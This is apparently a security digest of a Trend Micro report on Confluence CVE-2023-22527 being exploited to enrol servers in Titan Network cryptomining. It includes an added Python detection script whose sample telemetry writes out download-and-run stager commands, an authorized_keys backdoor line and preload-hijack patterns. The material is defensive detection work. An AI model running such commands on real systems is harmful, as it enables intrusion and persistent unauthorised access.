October 30, 2024 at 03:44AM
Trend Micro researchers identified an attacker exploiting the CVE-2023-22527 vulnerability in Atlassian Confluence to execute remote code for cryptomining via the Titan Network. The attacker performed reconnaissance, installed Titan binaries on compromised machines, and connected them to the Cassini Testnet, aiming for financial gain through delegated proof of stake rewards.
### Meeting Notes Summary
#### Incident Overview
– **Attack Type**: Exploitation of the Atlassian Confluence vulnerability CVE-2023-22527 for remote code execution (RCE), with the goal of cryptomining through the Titan Network.
– **Malicious Actor Tactics**: Used public IP lookup services and standard system commands to profile the compromised server, then downloaded and executed shell scripts that install the Titan binaries.
– **Goal**: Connect compromised machines to the Cassini Testnet and earn reward tokens through its delegated proof-of-stake mechanism.
#### Attack Sequence
1. **Initial Compromise**: Exploited CVE-2023-22527, a template injection flaw in Confluence Data Center and Server, to gain remote code execution.
2. **Information Gathering**:
– Ran commands to enumerate the filesystem, the current working directory and the operating system.
– Queried public IP lookup services to learn the compromised server's public IP address.
3. **Payload Deployment**:
– Downloaded and executed multiple shell scripts (named a0, a1, a2, a3, a4).
– Installed Titan binaries and connected to the Titan Network with the attacker’s identity.
4. **Resource Usage**:
– Allocated the host's hardware resources to the Titan node and ran additional mining clients (aleo-pool) alongside it.
5. **Persistence Mechanisms**:
– Added the attacker's SSH public key to authorized_keys for potential lateral movement and altered the SSH daemon configuration to keep future access.
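The sequence above can be turned into detection logic over process telemetry: shells spawned by the Confluence JVM that do discovery, pull a payload, run one of the a0 to a4 stagers and then touch SSH persistence. The block below is an added example, not Trend Micro's code or data. The sample events, hostnames, IPs (TEST-NET) and timestamps are constructed; the list of public IP lookup hosts is an assumption, and T1016 is my mapping for the IP lookup step, which the page's ATT&CK table does not list.

```python
"""Hunt for the CVE-2023-22527 post-exploitation chain in process telemetry.

Added example for this summary, not Trend Micro's code. All events below are
constructed to mirror the attack sequence in the writeup.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    ts: datetime
    host: str
    user: str      # account the shell ran as
    parent: str    # parent image; the Confluence JVM shows up as "java"
    cmdline: str


# Assumption: common public IP lookup services an attacker might query.
IP_LOOKUP_HOSTS = r"(ifconfig\.me|ipinfo\.io|api\.ipify\.org|icanhazip\.com)"

# ATT&CK technique per command pattern. IDs are those in the page's table,
# plus T1016 (System Network Configuration Discovery) for the public IP lookup.
RULES = [
    ("T1082",     re.compile(r"^(uname|hostname|cat /etc/os-release|id|whoami)\b")),
    ("T1083",     re.compile(r"^(pwd|ls|df|find)\b")),
    ("T1057",     re.compile(r"^(ps|top)\b")),
    ("T1016",     re.compile(rf"^(curl|wget)\b.*{IP_LOOKUP_HOSTS}")),
    ("T1105",     re.compile(r"^(curl|wget)\b.*https?://")),
    ("T1059.004", re.compile(r"^(sh|bash)\s+\S*/a[0-4]\b")),  # a0..a4 stagers from the writeup
    ("T1098.004", re.compile(r"authorized_keys")),
    ("T1574.006", re.compile(r"ld\.so\.preload|LD_PRELOAD=")),
]
DISCOVERY = {"T1082", "T1083", "T1057", "T1016"}
PERSISTENCE = {"T1098.004", "T1574.006"}


def classify(cmdline):
    """Return the set of technique IDs a single command line matches."""
    techs = {tid for tid, rx in RULES if rx.search(cmdline)}
    if "T1016" in techs:
        techs.discard("T1105")  # a public-IP lookup is discovery, not tool transfer
    return techs


def hunt(events, service_user="confluence", parent="java", window=timedelta(minutes=15)):
    """One alert per host where the Confluence JVM spawned shells that performed
    discovery, fetched a payload (T1105) and ran a stager (T1059.004) inside
    `window`. Severity becomes 'critical' when persistence is seen in the same window."""
    by_host = {}
    for e in sorted(events, key=lambda e: e.ts):
        if e.user != service_user or e.parent != parent:
            continue  # interactive admin shells and other parents are out of scope
        techs = classify(e.cmdline)
        if techs:
            by_host.setdefault(e.host, []).append((e.ts, techs, e.cmdline))

    alerts = {}
    for host, hits in by_host.items():
        for i, (t0, _, _) in enumerate(hits):
            seen, cmds = set(), []
            for ts, techs, cmd in hits[i:]:
                if ts - t0 > window:
                    break
                seen |= techs
                cmds.append(cmd)
            if seen & DISCOVERY and "T1105" in seen and "T1059.004" in seen:
                alerts[host] = {
                    "severity": "critical" if seen & PERSISTENCE else "high",
                    "techniques": sorted(seen),
                    "first_seen": t0,
                    "commands": cmds,
                }
                break
    return alerts


# Constructed sample telemetry (not from the original report).
T0 = datetime(2024, 10, 30, 3, 44)
H = "confluence-01"
SAMPLE_EVENTS = [
    Event(T0, H, "confluence", "java", "uname -a"),
    Event(T0 + timedelta(seconds=5), H, "confluence", "java", "pwd"),
    Event(T0 + timedelta(seconds=9), H, "confluence", "java", "ps aux"),
    Event(T0 + timedelta(seconds=20), H, "confluence", "java", "curl -s ifconfig.me"),
    Event(T0 + timedelta(minutes=1), H, "confluence", "java",
          "curl -fsSL http://198.51.100.23/a0 -o /tmp/a0"),
    Event(T0 + timedelta(minutes=1, seconds=2), H, "confluence", "java", "sh /tmp/a0"),
    Event(T0 + timedelta(minutes=3), H, "confluence", "java",
          "sh -c 'echo ssh-rsa AAAAB3NzaC1yc2E... >> /home/confluence/.ssh/authorized_keys'"),
    # Benign: an administrator listing processes from an SSH session.
    Event(T0 + timedelta(minutes=4), H, "admin", "sshd", "ps aux"),
    # A second host with only routine discovery: must not alert.
    Event(T0, "confluence-02", "confluence", "java", "uname -a"),
]

if __name__ == "__main__":
    for host, alert in hunt(SAMPLE_EVENTS).items():
        print(host, alert["severity"], alert["techniques"])
```

The correlation key is the parent process: a web application server has no business spawning `uname`, `curl` and `sh` in quick succession, so the chain fires on the combination rather than on any single command, which keeps routine admin activity (the `sshd`-parented `ps aux`) and isolated health checks quiet.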
#### Conclusion
– **Key Takeaways**:
– The attack chained exploitation, discovery, tool transfer and persistence to turn the server into a long-lived cryptomining node.
– It underlines the importance of timely patching, monitoring of servers and their spawned processes, and tight access controls.
– Trend Micro recommends its Trend Vision One™ platform for protection against threats of this kind.
#### MITRE ATT&CK Techniques
| Tactic | Technique | Technique ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Discovery | System Information Discovery | T1082 |
| | File and Directory Discovery | T1083 |
| | Process Discovery | T1057 |
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 |
| Persistence | Hijack Execution Flow: Dynamic Linker Hijacking | T1574.006 |
| | Account Manipulation: SSH Authorized Keys | T1098.004 |
| Command and Control | Ingress Tool Transfer | T1105 |
| | Application Layer Protocol: Web Protocols | T1071.001 |
#### Indicators of Compromise (IOCs)
– The a0 to a4 shell scripts and the URLs used to download them and to communicate with the attacker's infrastructure, as listed in the original Trend Micro report.
– The IP addresses tied to the attack, as listed in the original report.
#### Recommendations
– Patch Confluence Data Center and Server to a release fixed for CVE-2023-22527 (8.5.4 LTS or later) and keep all internet-facing systems current.
– Monitor for shells spawned by the Confluence process, outbound downloads to unfamiliar hosts, new entries in authorized_keys, and changes to the SSH daemon configuration and /etc/ld.so.preload.
– Use endpoint and network detection and response tooling to catch and contain this kind of activity early.